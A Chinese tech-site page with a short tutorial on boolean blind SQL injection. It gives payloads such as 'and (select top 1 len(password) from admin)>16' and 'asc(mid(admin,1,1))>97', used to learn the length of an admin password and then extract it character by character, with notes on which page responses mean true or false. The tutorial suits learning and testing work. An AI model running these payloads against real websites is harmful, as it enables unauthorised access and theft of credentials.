最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
当前位置: 首页 - 科技 - 知识百科 - 正文

关于sql盲注语法

来源:动视网 责编:小采 时间:2020-11-09 06:54:42
文档

关于sql盲注语法

关于sql盲注语法:如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(passwo
推荐度:
导读关于sql盲注语法:如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(passwo


如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容

获取数据长度:

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

获取指定位数的数据:

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97
mid(字符串,截取的位置,截取字符数)
asc() //将字符转换成ascii码 方便进行比较

推荐:《mysql视频教程》

文档

关于sql盲注语法

关于sql盲注语法:如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(passwo
推荐度:
标签: sql 注入 sql注入
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top